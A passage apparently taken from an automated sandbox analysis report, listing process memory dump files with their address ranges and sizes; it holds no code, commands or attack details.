                                                                                                                                                                                                    • memory/6440-5764-0x00007FFAEB8D0000-0x00007FFAEBDF2000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5.1MB

                                                                                                                                                                                                    • memory/6440-6043-0x00007FFAF2F50000-0x00007FFAF306C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                    • memory/6440-5708-0x00007FFAEAA90000-0x00007FFAEB07E000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                    • memory/6440-6044-0x00007FFB060F0000-0x00007FFB06109000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      100KB

                                                                                                                                                                                                    • memory/6440-5765-0x00007FFAF3070000-0x00007FFAF313D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      820KB

                                                                                                                                                                                                    • memory/6440-5688-0x00007FFB061C0000-0x00007FFB061D9000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      100KB

                                                                                                                                                                                                    • memory/6440-5695-0x00007FFB061B0000-0x00007FFB061BD000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      52KB

                                                                                                                                                                                                    • memory/6440-5851-0x00007FFB02720000-0x00007FFB02753000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      204KB

                                                                                                                                                                                                    • memory/6440-5655-0x00007FFAEAA90000-0x00007FFAEB07E000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                    • memory/6440-5660-0x00007FFB0C200000-0x00007FFB0C20F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      60KB

                                                                                                                                                                                                    • memory/6440-5690-0x00007FFAF3140000-0x00007FFAF32B6000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.5MB

                                                                                                                                                                                                    • memory/6440-5691-0x00007FFB073F0000-0x00007FFB0741D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      180KB

                                                                                                                                                                                                    • memory/6440-5703-0x00007FFAF2F50000-0x00007FFAF306C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                    • memory/6440-5763-0x00007FFB060F0000-0x00007FFB06109000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      100KB

                                                                                                                                                                                                    • memory/6440-5689-0x00007FFB02790000-0x00007FFB027B3000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      140KB

                                                                                                                                                                                                    • memory/6440-5696-0x00007FFAEB8D0000-0x00007FFAEBDF2000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5.1MB

                                                                                                                                                                                                    • memory/6440-5697-0x00007FFAF3070000-0x00007FFAF313D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      820KB

                                                                                                                                                                                                    • memory/6440-5698-0x00007FFB02720000-0x00007FFB02753000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      204KB

                                                                                                                                                                                                    • memory/6440-5701-0x00007FFB026E0000-0x00007FFB026F4000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      80KB

                                                                                                                                                                                                    • memory/6440-5702-0x00007FFB02710000-0x00007FFB0271D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      52KB

                                                                                                                                                                                                    • memory/6440-6045-0x00007FFB07420000-0x00007FFB07444000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      144KB

                                                                                                                                                                                                    • memory/6440-5723-0x00007FFAF3140000-0x00007FFAF32B6000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.5MB

                                                                                                                                                                                                    • memory/6440-5714-0x00007FFB07420000-0x00007FFB07444000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      144KB

                                                                                                                                                                                                    • memory/6440-5659-0x00007FFB07420000-0x00007FFB07444000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      144KB

                                                                                                                                                                                                    • memory/6440-5722-0x00007FFB02790000-0x00007FFB027B3000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      140KB

                                                                                                                                                                                                    • memory/6728-5753-0x0000000000EB0000-0x00000000011D0000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      3.1MB

                                                                                                                                                                                                    • memory/6728-5709-0x0000000000EB0000-0x00000000011D0000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      3.1MB

                                                                                                                                                                                                    • memory/6848-5775-0x000002CF7FF60000-0x000002CF7FF82000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      136KB

                                                                                                                                                                                                    • memory/6908-5710-0x00007FFB021E0000-0x00007FFB0220D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      180KB

                                                                                                                                                                                                    • memory/6908-5749-0x00007FFB02070000-0x00007FFB02089000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      100KB

                                                                                                                                                                                                    • memory/6908-5720-0x00007FFAF27D0000-0x00007FFAF289D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      820KB

                                                                                                                                                                                                    • memory/6908-5719-0x00007FFAE6D50000-0x00007FFAE7272000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5.1MB

                                                                                                                                                                                                    • memory/6908-5718-0x00007FFB01970000-0x00007FFB019A3000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      204KB

                                                                                                                                                                                                    • memory/6908-5717-0x00007FFB021D0000-0x00007FFB021DD000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      52KB

                                                                                                                                                                                                    • memory/6908-5716-0x00007FFB02070000-0x00007FFB02089000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      100KB

                                                                                                                                                                                                    • memory/6908-5741-0x00007FFAE97E0000-0x00007FFAE9DCE000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                    • memory/6908-5742-0x00007FFAE6D50000-0x00007FFAE7272000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5.1MB

                                                                                                                                                                                                    • memory/6908-5713-0x00007FFB026C0000-0x00007FFB026D9000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      100KB

                                                                                                                                                                                                    • memory/6908-5712-0x00007FFAF2DD0000-0x00007FFAF2F46000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.5MB

                                                                                                                                                                                                    • memory/6908-5711-0x00007FFB02090000-0x00007FFB020B3000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      140KB

                                                                                                                                                                                                    • memory/6908-5725-0x00007FFB02060000-0x00007FFB0206D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      52KB

                                                                                                                                                                                                    • memory/6908-5724-0x00007FFB01950000-0x00007FFB01964000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      80KB

                                                                                                                                                                                                    • memory/6908-5748-0x00007FFAF2DD0000-0x00007FFAF2F46000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.5MB

                                                                                                                                                                                                    • memory/6908-5745-0x00007FFB0BF40000-0x00007FFB0BF4F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      60KB

                                                                                                                                                                                                    • memory/6908-5746-0x00007FFB021E0000-0x00007FFB0220D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      180KB

                                                                                                                                                                                                    • memory/6908-5747-0x00007FFB02090000-0x00007FFB020B3000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      140KB

                                                                                                                                                                                                    • memory/6908-5744-0x00007FFB02760000-0x00007FFB02784000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      144KB

                                                                                                                                                                                                    • memory/6908-5721-0x00007FFAE97E0000-0x00007FFAE9DCE000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                    • memory/6908-5693-0x00007FFB0BF40000-0x00007FFB0BF4F000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      60KB

                                                                                                                                                                                                    • memory/6908-5692-0x00007FFB02760000-0x00007FFB02784000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      144KB

                                                                                                                                                                                                    • memory/6908-5750-0x00007FFB021D0000-0x00007FFB021DD000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      52KB

                                                                                                                                                                                                    • memory/6908-5740-0x00007FFB026C0000-0x00007FFB026D9000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      100KB

                                                                                                                                                                                                    • memory/6908-5687-0x00007FFAE97E0000-0x00007FFAE9DCE000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                    • memory/6908-5743-0x00007FFAF27D0000-0x00007FFAF289D000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      820KB

                                                                                                                                                                                                    • memory/6908-5751-0x00007FFB01970000-0x00007FFB019A3000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      204KB

                                                                                                                                                                                                    • memory/7464-5874-0x000002DE2E600000-0x000002DE2E608000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      32KB